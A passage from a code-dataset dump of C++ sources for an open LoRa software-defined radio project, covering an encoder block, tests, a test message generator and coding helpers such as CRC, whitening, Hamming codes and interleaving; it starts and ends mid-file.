"text": "// Copyright (c) 2016-2018 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Testing.hpp>\n#include <Pothos/Framework.hpp>\n#include <Pothos/Proxy.hpp>\n#include <Pothos/Remote.hpp>\n#include <iostream>\n#include \"LoRaCodes.hpp\"\n#include <json.hpp>\n\nusing json = nlohmann::json;\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_encoder_to_decoder)\n{\n auto env = Pothos::ProxyEnvironment::make(\"managed\");\n auto registry = env->findProxy(\"Pothos/BlockRegistry\");\n\n auto feeder = registry.call(\"/blocks/feeder_source\", \"uint8\");\n auto encoder = registry.call(\"/lora/lora_encoder\");\n auto decoder = registry.call(\"/lora/lora_decoder\");\n auto collector = registry.call(\"/blocks/collector_sink\", \"uint8\");\n\n std::vector<std::string> testCodingRates;\n testCodingRates.push_back(\"4/4\");\n testCodingRates.push_back(\"4/5\");\n testCodingRates.push_back(\"4/6\");\n testCodingRates.push_back(\"4/7\");\n testCodingRates.push_back(\"4/8\");\n\n for (size_t SF = 7; SF <= 12; SF++)\n {\n std::cout << \"Testing SF \" << SF << std::endl;\n for (const auto &CR : testCodingRates)\n {\n std::cout << \" with CR \" << CR << std::endl;\n encoder.call(\"setSpreadFactor\", SF);\n decoder.call(\"setSpreadFactor\", SF);\n encoder.call(\"setCodingRate\", CR);\n decoder.call(\"setCodingRate\", CR);\n\n //create a test plan\n json testPlan;\n testPlan[\"enablePackets\"] = true;\n testPlan[\"minValue\"] = 0;\n testPlan[\"maxValue\"] = 255;\n auto expected = feeder.call(\"feedTestPlan\", testPlan.dump());\n\n //create tester topology\n {\n Pothos::Topology topology;\n topology.connect(feeder, 0, encoder, 0);\n topology.connect(encoder, 0, decoder, 0);\n topology.connect(decoder, 0, collector, 0);\n topology.commit();\n POTHOS_TEST_TRUE(topology.waitInactive());\n //std::cout << topology.queryJSONStats() << std::endl;\n }\n\n std::cout << \"verifyTestPlan\" << std::endl;\n collector.call(\"verifyTestPlan\", expected);\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_loopback)\n{\n auto env = Pothos::ProxyEnvironment::make(\"managed\");\n auto registry = env->findProxy(\"Pothos/BlockRegistry\");\n\n const size_t SF = 10;\n auto feeder = registry.call(\"/blocks/feeder_source\", \"uint8\");\n auto encoder = registry.call(\"/lora/lora_encoder\");\n auto mod = registry.call(\"/lora/lora_mod\", SF);\n auto adder = registry.call(\"/comms/arithmetic\", \"complex_float32\", \"ADD\");\n auto noise = registry.call(\"/comms/noise_source\", \"complex_float32\");\n auto demod = registry.call(\"/lora/lora_demod\", SF);\n auto decoder = registry.call(\"/lora/lora_decoder\");\n auto collector = registry.call(\"/blocks/collector_sink\", \"uint8\");\n\n std::vector<std::string> testCodingRates;\n //these first few dont have error correction\n //testCodingRates.push_back(\"4/4\");\n //testCodingRates.push_back(\"4/5\");\n //testCodingRates.push_back(\"4/6\");\n testCodingRates.push_back(\"4/7\");\n testCodingRates.push_back(\"4/8\");\n\n for (const auto &CR : testCodingRates)\n {\n std::cout << \"Testing with CR \" << CR << std::endl;\n\n encoder.call(\"setSpreadFactor\", SF);\n decoder.call(\"setSpreadFactor\", SF);\n encoder.call(\"setCodingRate\", CR);\n decoder.call(\"setCodingRate\", CR);\n mod.call(\"setAmplitude\", 1.0);\n noise.call(\"setAmplitude\", 4.0);\n noise.call(\"setWaveform\", \"NORMAL\");\n mod.call(\"setPadding\", 512);\n demod.call(\"setMTU\", 512);\n\n //create a test plan\n json testPlan;\n testPlan[\"enablePackets\"] = true;\n testPlan[\"minValue\"] = 0;\n testPlan[\"maxValue\"] = 255;\n testPlan[\"minBuffers\"] = 5;\n testPlan[\"maxBuffers\"] = 5;\n testPlan[\"minBufferSize\"] = 8;\n testPlan[\"maxBufferSize\"] = 128;\n auto expected = feeder.call(\"feedTestPlan\", testPlan.dump());\n\n //create tester topology\n {\n Pothos::Topology topology;\n topology.connect(feeder, 0, encoder, 0);\n topology.connect(encoder, 0, mod, 0);\n topology.connect(mod, 0, adder, 0);\n topology.connect(noise, 0, adder, 1);\n topology.connect(adder, 0, demod, 0);\n topology.connect(demod, 0, decoder, 0);\n topology.connect(decoder, 0, collector, 0);\n topology.commit();\n POTHOS_TEST_TRUE(topology.waitInactive(0.1, 0));\n //std::cout << topology.queryJSONStats() << std::endl;\n }\n\n std::cout << \"decoder dropped \" << decoder.call<unsigned long long>(\"getDropped\") << std::endl;\n std::cout << \"verifyTestPlan\" << std::endl;\n collector.call(\"verifyTestPlan\", expected);\n }\n}\n"
},
{
"alpha_fraction": 0.6055105924606323,
"alphanum_fraction": 0.631888210773468,
"avg_line_length": 30.257143020629883,
"blob_id": "470e09af398448384c9c3d06b604e4ad71a601b5",
"content_id": "384489b37ca4b6b8468d8b1fec5fe2e7c3057250",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7658,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 245,
"path": "/LoRaEncoder.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// Copyright (c) 2016-2016 Arne Hennig\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <cstring>\n#include \"LoRaCodes.hpp\"\n\n/***********************************************************************\n * |PothosDoc LoRa Encoder\n *\n * Encode bytes into LoRa modulation symbols.\n * This is a simple encoder and does not offer many options.\n * The job of the encoder is to scramble, add error correction,\n * interleaving, and gray decoded to handle measurement error.\n *\n * <h2>Input format</h2>\n *\n * A packet message with a payload containing bytes to transmit.\n *\n * <h2>Output format</h2>\n *\n * A packet message with a payload containing LoRa modulation symbols.\n * The format of the packet payload is a buffer of unsigned shorts.\n * A 16-bit short can fit all size symbols from 7 to 12 bits.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |param sf[Spread factor] The spreading factor sets the bits per symbol.\n * |default 10\n *\n * |param ppm[Symbol size] The size of the symbol set (_ppm <= SF).\n * Specify _ppm less than the spread factor to use a reduced symbol set.\n * The special value of zero uses the full symbol set (PPM == SF).\n * |default 0\n * |option [Full set] 0\n * |widget ComboBox(editable=true)\n * |preview valid\n *\n * |param cr[Coding Rate] The number of error correction bits.\n * |option [4/4] \"4/4\"\n * |option [4/5] \"4/5\"\n * |option [4/6] \"4/6\"\n * |option [4/7] \"4/7\"\n * |option [4/8] \"4/8\"\n * |default \"4/8\"\n *\n * |param explicit Enable/disable explicit header mode.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param crc Enable/disable crc.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param whitening Enable/disable whitening of the input message.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |factory /lora/lora_encoder()\n * |setter setSpreadFactor(sf)\n * |setter setSymbolSize(ppm)\n * |setter setCodingRate(cr)\n * |setter enableExplicit(explicit)\n * |setter enableCrc(crc)\n * |setter enableWhitening(whitening)\n **********************************************************************/\nclass LoRaEncoder : public Pothos::Block\n{\npublic:\n\tLoRaEncoder(void) :\n\t\t_sf(10),\n\t\t_ppm(0),\n\t\t_rdd(4),\n\t\t_explicit(true),\n\t\t_crc(true),\n\t\t_whitening(true)\n\t{\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, setSpreadFactor));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, setSymbolSize));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, setCodingRate));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, enableWhitening));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, enableExplicit));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaEncoder, enableCrc));\n\t\tthis->setupInput(\"0\");\n\t\tthis->setupOutput(\"0\");\n\t}\n\n\tstatic Block *make(void)\n\t{\n\t\treturn new LoRaEncoder();\n\t}\n\n\tvoid setSpreadFactor(const size_t sf)\n\t{\n\t\t_sf = sf;\n\t}\n\n\tvoid setSymbolSize(const size_t ppm)\n\t{\n\t\t_ppm = ppm;\n\t}\n\n\tvoid setCodingRate(const std::string &cr)\n\t{\n\t\tif (cr == \"4/4\") _rdd = 0;\n\t\telse if (cr == \"4/5\") _rdd = 1;\n\t\telse if (cr == \"4/6\") _rdd = 2;\n\t\telse if (cr == \"4/7\") _rdd = 3;\n\t\telse if (cr == \"4/8\") _rdd = 4;\n\t\telse throw Pothos::InvalidArgumentException(\"LoRaEncoder::setCodingRate(\" + cr + \")\", \"unknown coding rate\");\n\t}\n\n\tvoid enableWhitening(const bool whitening)\n\t{\n\t\t_whitening = whitening;\n\t}\n\n\tvoid enableExplicit(const bool __explicit) {\n\t\t_explicit = __explicit;\n\t}\n\n\tvoid enableCrc(const bool crc) {\n\t\t_crc = crc;\n\t}\n\n\tvoid encodeFec(std::vector<uint8_t> &codewords, const size_t RDD, size_t &cOfs, size_t &dOfs, const uint8_t *bytes, const size_t count) {\n\t\tif (RDD == 0) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = bytes[dOfs >> 1] >> 4;\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = bytes[dOfs >> 1] & 0xf;\n\t\t} else if (RDD == 1) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = encodeParity54(bytes[dOfs >> 1] >> 4);\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = encodeParity54(bytes[dOfs >> 1] & 0xf);\n\t\t} else if (RDD == 2) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = encodeParity64(bytes[dOfs >> 1] >> 4);\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = encodeParity64(bytes[dOfs >> 1] & 0xf);\n\t\t} else if (RDD == 3) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = encodeHamming74sx(bytes[dOfs >> 1] >> 4);\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = encodeHamming74sx(bytes[dOfs >> 1] & 0xf);\n\t\t} else if (RDD == 4) for (size_t i = 0; i < count; i++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tcodewords[cOfs++] = encodeHamming84sx(bytes[dOfs >> 1] >> 4);\n\t\t\telse\n\t\t\t\tcodewords[cOfs++] = encodeHamming84sx(bytes[dOfs >> 1] & 0xf);\n\t\t}\n\t}\n\n\tvoid work(void) {\n\t\tauto inPort = this->input(0);\n\t\tauto outPort = this->output(0);\n\t\tif (not inPort->hasMessage()) return;\n\t\tconst size_t PPM = (_ppm == 0) ? _sf : _ppm;\n\t\tif (PPM > _sf) throw Pothos::Exception(\"LoRaEncoder::work()\", \"failed check: PPM <= SF\");\n\n\t\t//extract the input bytes\n\t\tauto msg = inPort->popMessage();\n\t\tauto pkt = msg.extract<Pothos::Packet>();\n\t\tsize_t payloadLength = pkt.payload.length + (_crc ? 2 : 0);\n\t\tstd::vector<uint8_t> bytes(payloadLength);\n\t\tstd::memcpy(bytes.data(), pkt.payload.as<const void *>(), pkt.payload.length);\n\t\t\t\t\n\t\tconst size_t numCodewords = roundUp(bytes.size() * 2 + (_explicit ? N_HEADER_CODEWORDS:0), PPM);\n\t\tconst size_t numSymbols = N_HEADER_SYMBOLS + (numCodewords / PPM - 1) * (4 + _rdd);\t\t// header is always coded with 8 bits\n\t\t\n\t\tsize_t cOfs = 0;\n\t\tsize_t dOfs = 0;\n\t\tstd::vector<uint8_t> codewords(numCodewords);\n\n\t\tif (_crc) {\n\t\t\tuint16_t crc = sx1272DataChecksum(bytes.data(), pkt.payload.length);\n\t\t\tbytes[pkt.payload.length] = crc & 0xff;\n\t\t\tbytes[pkt.payload.length+1] = (crc >> 8) & 0xff;\n\t\t}\n\n\t\tif (_explicit) {\n\t\t\tstd::vector<uint8_t> hdr(3);\n\t\t\tuint8_t len = pkt.payload.length;\n\t\t\thdr[0] = len;\n\t\t\thdr[1] = (_crc ? 1 : 0) | (_rdd << 1);\n\t\t\thdr[2] = headerChecksum(hdr.data());\n\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[0] >> 4);\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[0] & 0xf);\t// length\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[1] & 0xf);\t// crc / fec info\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[2] >> 4);\t\t// checksum\n\t\t\tcodewords[cOfs++] = encodeHamming84sx(hdr[2] & 0xf);\n\t\t}\n\t\tsize_t cOfs1 = cOfs;\n\t\tencodeFec(codewords, 4, cOfs, dOfs, bytes.data(), PPM - cOfs);\n\t\tif (_whitening) {\n\t\t\tSx1272ComputeWhitening(codewords.data() + cOfs1, PPM - cOfs1, 0, HEADER_RDD);\n\t\t}\n\n\t\tif (numCodewords > PPM) {\n\t\t\tsize_t cOfs2 = cOfs;\n\t\t\tencodeFec(codewords, _rdd, cOfs, dOfs, bytes.data(), numCodewords-PPM);\n\t\t\tif (_whitening) {\n\t\t\t\tSx1272ComputeWhitening(codewords.data() + cOfs2, numCodewords - PPM, PPM - cOfs1, _rdd);\n\t\t\t}\n\t\t}\n\n\t\t//interleave the codewords into symbols\n\t\tstd::vector<uint16_t> symbols(numSymbols);\n\t\tdiagonalInterleaveSx(codewords.data(), PPM, symbols.data(), PPM, HEADER_RDD);\n\t\tif (numCodewords > PPM) {\n\t\t\tdiagonalInterleaveSx(codewords.data() + PPM, numCodewords-PPM, symbols.data()+N_HEADER_SYMBOLS, PPM, _rdd);\n\t\t}\n\n\t\t//gray decode, when SF > PPM, pad out LSBs\n\t\tfor (auto &sym : symbols){\n\t\t\tsym = grayToBinary16(sym);\n\t\t\tsym <<= (_sf - PPM);\n\t\t}\n\n\t\t//post the output symbols\n\t\tPothos::Packet out;\n\t\tout.payload = Pothos::BufferChunk(typeid(uint16_t), symbols.size());\n\t\tstd::memcpy(out.payload.as<void *>(), symbols.data(), out.payload.length);\n\t\toutPort->postMessage(out);\n\t}\n\nprivate:\n size_t _sf;\n size_t _ppm;\n\tsize_t _rdd;\n\tbool _explicit;\n\tbool _crc;\n bool _whitening;\n};\n\nstatic Pothos::BlockRegistry registerLoRaEncoder(\n \"/lora/lora_encoder\", &LoRaEncoder::make);\n"
},
{
"alpha_fraction": 0.5293624401092529,
"alphanum_fraction": 0.5411073565483093,
"avg_line_length": 21.923076629638672,
"blob_id": "d978394309aa15931a35e92396b6be01c4dda144",
"content_id": "85ccc586c5cba95a68cbcf9ccf3e20dd82f976b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 52,
"path": "/TestGen.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <cstring>\n\n/***********************************************************************\n * |PothosDoc LoRa Test Gen\n *\n * Generate test messages for the LoRa encoder for testing purposes.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |factory /lora/test_gen()\n **********************************************************************/\nclass TestGen : public Pothos::Block\n{\npublic:\n TestGen(void)\n {\n this->setupOutput(0);\n }\n\n static Block *make(void)\n {\n return new TestGen();\n }\n\n void activate(void)\n {\n _count = 0;\n }\n\n void work(void)\n {\n auto msgStr = std::to_string(_count++);\n Pothos::BufferChunk msgBuff(typeid(uint8_t), msgStr.size());\n std::memcpy(msgBuff.as<void *>(), msgStr.data(), msgStr.size());\n Pothos::Packet outPkt;\n outPkt.payload = msgBuff;\n this->output(0)->postMessage(outPkt);\n }\n\nprivate:\n //configuration\n unsigned long long _count;\n};\n\nstatic Pothos::BlockRegistry registerTestGen(\n \"/lora/test_gen\", &TestGen::make);\n"
},
{
"alpha_fraction": 0.41178640723228455,
"alphanum_fraction": 0.47093966603279114,
"avg_line_length": 33.41116714477539,
"blob_id": "87b5bbad9ddbf602a02e985c31801077ad100697",
"content_id": "1961f8599b3214a0bcea7bbf17053759f5a09fdd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 13558,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 394,
"path": "/LoRaCodes.hpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "/***********************************************************************\n * Defines\n **********************************************************************/\n#define HEADER_RDD 4\n#define N_HEADER_SYMBOLS (HEADER_RDD + 4)\n#define N_HEADER_CODEWORDS 5\n\n\n/***********************************************************************\n * Round functions\n **********************************************************************/\nstatic inline unsigned roundUp(unsigned num, unsigned factor)\n{\n return ((num + factor - 1) / factor) * factor;\n}\n\n/***********************************************************************\n * Simple 8-bit checksum routine\n **********************************************************************/\nstatic inline uint8_t checksum8(const uint8_t *p, const size_t len)\n{\n uint8_t acc = 0;\n for (size_t i = 0; i < len; i++)\n {\n acc = (acc >> 1) + ((acc & 0x1) << 7); //rotate\n acc += p[i]; //add\n }\n return acc;\n}\n\nstatic inline uint8_t headerChecksum(const uint8_t *h) {\n\tauto a0 = (h[0] >> 4) & 0x1;\n\tauto a1 = (h[0] >> 5) & 0x1;\n\tauto a2 = (h[0] >> 6) & 0x1;\n\tauto a3 = (h[0] >> 7) & 0x1;\n\n\tauto b0 = (h[0] >> 0) & 0x1;\n\tauto b1 = (h[0] >> 1) & 0x1;\n\tauto b2 = (h[0] >> 2) & 0x1;\n\tauto b3 = (h[0] >> 3) & 0x1;\n\n\tauto c0 = (h[1] >> 0) & 0x1;\n\tauto c1 = (h[1] >> 1) & 0x1;\n\tauto c2 = (h[1] >> 2) & 0x1;\n\tauto c3 = (h[1] >> 3) & 0x1;\n\n\tuint8_t res;\n\tres = (a0 ^ a1 ^ a2 ^ a3) << 4;\n\tres |= (a3 ^ b1 ^ b2 ^ b3 ^ c0) << 3;\n\tres |= (a2 ^ b0 ^ b3 ^ c1 ^ c3) << 2;\n\tres |= (a1 ^ b0 ^ b2 ^ c0 ^ c1 ^ c2) << 1;\n\tres |= a0 ^ b1 ^ c0 ^ c1 ^ c2 ^ c3;\n\t\n\treturn res;\n}\n\nstatic inline uint16_t crc16sx(uint16_t crc, const uint16_t poly) {\n\tfor (int i = 0; i < 8; i++) {\n\t\tif (crc & 0x8000) {\n\t\t\tcrc = (crc << 1) ^ poly;\n\t\t}\n\t\telse {\n\t\t\tcrc <<= 1;\n\t\t}\n\t}\n\treturn crc;\n}\n\nstatic inline uint8_t xsum8(uint8_t t) {\n\tt ^= t >> 4;\n\tt ^= t >> 2;\n\tt ^= t >> 1;\n\treturn (t & 1);\n}\n\n/***********************************************************************\n * CRC reverse engineered from Sx1272 data stream.\n * Modified CCITT crc with masking of the output with an 8bit lfsr\n **********************************************************************/\nstatic inline uint16_t sx1272DataChecksum(const uint8_t *data, int length) {\n\tuint16_t res = 0;\n\tuint8_t v = 0xff;\n\tuint16_t crc = 0;\n\tfor (int i = 0; i < length; i++) {\n\t\tcrc = crc16sx(res, 0x1021);\n\t\tv = xsum8(v & 0xB8) | (v << 1);\n\t\tres = crc ^ data[i];\n\t}\n\tres ^= v; \n\tv = xsum8(v & 0xB8) | (v << 1);\n\tres ^= v << 8;\n\treturn res;\n}\n\n\n/***********************************************************************\n * http://www.semtech.com/images/datasheet/AN1200.18_AG.pdf\n **********************************************************************/\nstatic inline void SX1232RadioComputeWhitening( uint8_t *buffer, uint16_t bufferSize )\n{\n uint8_t WhiteningKeyMSB; // Global variable so the value is kept after starting the\n uint8_t WhiteningKeyLSB; // de-whitening process\n WhiteningKeyMSB = 0x01; // Init value for the LFSR, these values should be initialize only\n WhiteningKeyLSB = 0xFF; // at the start of a whitening or a de-whitening process\n // *buffer is a char pointer indicating the data to be whiten / de-whiten\n // buffersize is the number of char to be whiten / de-whiten\n // >> The whitened / de-whitened data are directly placed into the pointer\n uint8_t i = 0;\n uint16_t j = 0;\n uint8_t WhiteningKeyMSBPrevious = 0; // 9th bit of the LFSR\n for( j = 0; j < bufferSize; j++ ) // byte counter\n {\n buffer[j] ^= WhiteningKeyLSB; // XOR between the data and the whitening key\n for( i = 0; i < 8; i++ ) // 8-bit shift between each byte\n {\n WhiteningKeyMSBPrevious = WhiteningKeyMSB;\n WhiteningKeyMSB = ( WhiteningKeyLSB & 0x01 ) ^ ( ( WhiteningKeyLSB >> 5 ) & 0x01 );\n WhiteningKeyLSB= ( ( WhiteningKeyLSB >> 1 ) & 0xFF ) | ( ( WhiteningKeyMSBPrevious << 7 ) & 0x80 );\n }\n }\n}\n\n\n/***********************************************************************\n * Whitening generator reverse engineered from Sx1272 data stream.\n * Each bit of a codeword is combined with the output from a different position in the whitening sequence.\n **********************************************************************/\nstatic inline void Sx1272ComputeWhitening(uint8_t *buffer, uint16_t bufferSize, const int bitOfs, const int RDD) {\n\tstatic const int ofs0[8] = {6,4,2,0,-112,-114,-302,-34 };\t// offset into sequence for each bit\n\tstatic const int ofs1[5] = {6,4,2,0,-360 };\t\t\t\t\t// different offsets used for single parity mode (1 == RDD)\n\tstatic const int whiten_len = 510;\t\t\t\t\t\t\t// length of whitening sequence\n\tstatic const uint64_t whiten_seq[8] = {\t\t\t\t\t\t// whitening sequence\n\t\t0x0102291EA751AAFFL,0xD24B050A8D643A17L,0x5B279B671120B8F4L,0x032B37B9F6FB55A2L,\n\t\t0x994E0F87E95E2D16L,0x7CBCFC7631984C26L,0x281C8E4F0DAEF7F9L,0x1741886EB7733B15L\n\t};\n\tconst int *ofs = (1 == RDD) ? ofs1 : ofs0;\n\tint i, j;\n\tfor (j = 0; j < bufferSize; j++) {\n\t\tuint8_t x = 0;\n\t\tfor (i = 0; i < 4 + RDD; i++) {\n\t\t\tint t = (ofs[i] + j + bitOfs + whiten_len) % whiten_len;\n\t\t\tif (whiten_seq[t >> 6] & ((uint64_t)1 << (t & 0x3F))) {\n\t\t\t\tx |= 1 << i;\n\t\t\t}\n\t\t}\n\t\tbuffer[j] ^= x;\n\t}\t\n}\n\n/***********************************************************************\n * Whitening generator reverse engineered from Sx1272 data stream.\n * Same as above but using the actual interleaved LFSRs.\n **********************************************************************/\nstatic inline void Sx1272ComputeWhiteningLfsr(uint8_t *buffer, uint16_t bufferSize, const int bitOfs, const size_t RDD) {\n static const uint64_t seed1[2] = {0x6572D100E85C2EFF,0xE85C2EFFFFFFFFFF}; // lfsr start values\n static const uint64_t seed2[2] = {0x05121100F8ECFEEF,0xF8ECFEEFEFEFEFEF}; // lfsr start values for single parity mode (1 == RDD)\n const uint8_t m = 0xff >> (4 - RDD);\n uint64_t r[2] = {(1 == RDD)?seed2[0]:seed1[0],(1 == RDD)?seed2[1]:seed1[1]};\n int i,j;\n for (i = 0; i < bitOfs;i++){\n r[i & 1] = (r[i & 1] >> 8) | (((r[i & 1] >> 32) ^ (r[i & 1] >> 24) ^ (r[i & 1] >> 16) ^ r[i & 1]) << 56); // poly: 0x1D\n }\n for (j = 0; j < bufferSize; j++,i++) {\n buffer[j] ^= r[i & 1] & m;\n r[i & 1] = (r[i & 1] >> 8) | (((r[i & 1] >> 32) ^ (r[i & 1] >> 24) ^ (r[i & 1] >> 16) ^ r[i & 1]) << 56);\n }\t\n}\n\n/***********************************************************************\n * https://en.wikipedia.org/wiki/Gray_code\n **********************************************************************/\n\n/*\n * This function converts an unsigned binary\n * number to reflected binary Gray code.\n *\n * The operator >> is shift right. The operator ^ is exclusive or.\n */\nstatic inline unsigned short binaryToGray16(unsigned short num)\n{\n return num ^ (num >> 1);\n}\n\n/*\n * A more efficient version, for Gray codes of 16 or fewer bits.\n */\nstatic inline unsigned short grayToBinary16(unsigned short num)\n{\n num = num ^ (num >> 8);\n num = num ^ (num >> 4);\n num = num ^ (num >> 2);\n num = num ^ (num >> 1);\n return num;\n}\n\n/***********************************************************************\n * Encode a 4 bit word into a 8 bits with parity\n * Non standard version used in sx1272.\n * https://en.wikipedia.org/wiki/Hamming_code\n **********************************************************************/\nstatic inline unsigned char encodeHamming84sx(const unsigned char x)\n{\n auto d0 = (x >> 0) & 0x1;\n auto d1 = (x >> 1) & 0x1;\n auto d2 = (x >> 2) & 0x1;\n auto d3 = (x >> 3) & 0x1;\n \n unsigned char b = x & 0xf;\n b |= (d0 ^ d1 ^ d2) << 4;\n b |= (d1 ^ d2 ^ d3) << 5;\n b |= (d0 ^ d1 ^ d3) << 6;\n b |= (d0 ^ d2 ^ d3) << 7;\n return b;\n}\n\n/***********************************************************************\n * Decode 8 bits into a 4 bit word with single bit correction.\n * Non standard version used in sx1272.\n * Set error to true when a parity error was detected\n * Set bad to true when the result could not be corrected\n **********************************************************************/\nstatic inline unsigned char decodeHamming84sx(const unsigned char b, bool &error, bool &bad)\n{\n auto b0 = (b >> 0) & 0x1;\n auto b1 = (b >> 1) & 0x1;\n auto b2 = (b >> 2) & 0x1;\n auto b3 = (b >> 3) & 0x1;\n auto b4 = (b >> 4) & 0x1;\n auto b5 = (b >> 5) & 0x1;\n auto b6 = (b >> 6) & 0x1;\n auto b7 = (b >> 7) & 0x1;\n \n auto p0 = (b0 ^ b1 ^ b2 ^ b4);\n auto p1 = (b1 ^ b2 ^ b3 ^ b5);\n auto p2 = (b0 ^ b1 ^ b3 ^ b6);\n auto p3 = (b0 ^ b2 ^ b3 ^ b7);\n \n auto parity = (p0 << 0) | (p1 << 1) | (p2 << 2) | (p3 << 3);\n if (parity != 0) error = true;\n switch (parity & 0xf)\n {\n case 0xD: return (b ^ 1) & 0xf;\n case 0x7: return (b ^ 2) & 0xf;\n case 0xB: return (b ^ 4) & 0xf;\n case 0xE: return (b ^ 8) & 0xf;\n case 0x0:\n case 0x1:\n case 0x2:\n case 0x4:\n case 0x8: return b & 0xf;\n default: bad = true; return b & 0xf;\n }\n}\n\n/***********************************************************************\n * Encode a 4 bit word into a 7 bits with parity.\n * Non standard version used in sx1272.\n **********************************************************************/\nstatic inline unsigned char encodeHamming74sx(const unsigned char x)\n{\n auto d0 = (x >> 0) & 0x1;\n auto d1 = (x >> 1) & 0x1;\n auto d2 = (x >> 2) & 0x1;\n auto d3 = (x >> 3) & 0x1;\n \n unsigned char b = x & 0xf;\n b |= (d0 ^ d1 ^ d2) << 4;\n b |= (d1 ^ d2 ^ d3) << 5;\n b |= (d0 ^ d1 ^ d3) << 6;\n return b;\n}\n\n/***********************************************************************\n * Decode 7 bits into a 4 bit word with single bit correction.\n * Non standard version used in sx1272.\n * Set error to true when a parity error was detected\n **********************************************************************/\nstatic inline unsigned char decodeHamming74sx(const unsigned char b, bool &error)\n{\n auto b0 = (b >> 0) & 0x1;\n auto b1 = (b >> 1) & 0x1;\n auto b2 = (b >> 2) & 0x1;\n auto b3 = (b >> 3) & 0x1;\n auto b4 = (b >> 4) & 0x1;\n auto b5 = (b >> 5) & 0x1;\n auto b6 = (b >> 6) & 0x1;\n \n auto p0 = (b0 ^ b1 ^ b2 ^ b4);\n auto p1 = (b1 ^ b2 ^ b3 ^ b5);\n auto p2 = (b0 ^ b1 ^ b3 ^ b6);\n \n auto parity = (p0 << 0) | (p1 << 1) | (p2 << 2);\n if (parity != 0) error = true;\n switch (parity)\n {\n case 0x5: return (b ^ 1) & 0xf;\n case 0x7: return (b ^ 2) & 0xf;\n case 0x3: return (b ^ 4) & 0xf;\n case 0x6: return (b ^ 8) & 0xf;\n case 0x0:\n case 0x1:\n case 0x2:\n case 0x4: return b & 0xF;\n }\n return b & 0xf;\n}\n\n/***********************************************************************\n * Check parity for 5/4 code.\n * return true if parity is valid.\n **********************************************************************/\nstatic inline unsigned char checkParity54(const unsigned char b, bool &error) {\n\tauto x = b ^ (b >> 2);\n\tx = x ^ (x >> 1) ^ (b >> 4);\n\tif (x & 1) error = true;\n\treturn b & 0xf;\n}\n\nstatic inline unsigned char encodeParity54(const unsigned char b) {\n\tauto x = b ^ (b >> 2);\n\tx = x ^ (x >> 1);\n\treturn (b & 0xf) | ((x << 4) & 0x10);\n}\n\n/***********************************************************************\n* Check parity for 6/4 code.\n* return true if parity is valid.\n**********************************************************************/\nstatic inline unsigned char checkParity64(const unsigned char b, bool &error) {\n\tauto x = b ^ (b >> 1) ^ (b >> 2);\n\tauto y = x ^ b ^ (b >> 3);\n\t\n\tx ^= b >> 4;\n\ty ^= b >> 5;\n\tif ((x | y) & 1) error = true;\n\treturn b & 0xf;\n}\n\nstatic inline unsigned char encodeParity64(const unsigned char b) {\n\tauto x = b ^ (b >> 1) ^ (b >> 2);\n\tauto y = x ^ b ^ (b >> 3);\n\treturn ((x & 1) << 4) | ((y & 1) << 5) | (b & 0xf);\n}\n\n/***********************************************************************\n * Diagonal interleaver + deinterleaver\n **********************************************************************/\nstatic inline void diagonalInterleaveSx(const uint8_t *codewords, const size_t numCodewords, uint16_t *symbols, const size_t PPM, const size_t RDD){\n\tfor (size_t x = 0; x < numCodewords / PPM; x++)\t{\n\t\tconst size_t cwOff = x*PPM;\n\t\tconst size_t symOff = x*(4 + RDD);\n\t\tfor (size_t k = 0; k < 4 + RDD; k++){\n\t\t\tfor (size_t m = 0; m < PPM; m++){\n\t\t\t\tconst size_t i = (m + k + PPM) % PPM;\n\t\t\t\tconst auto bit = (codewords[cwOff + i] >> k) & 0x1;\n\t\t\t\tsymbols[symOff + k] |= (bit << 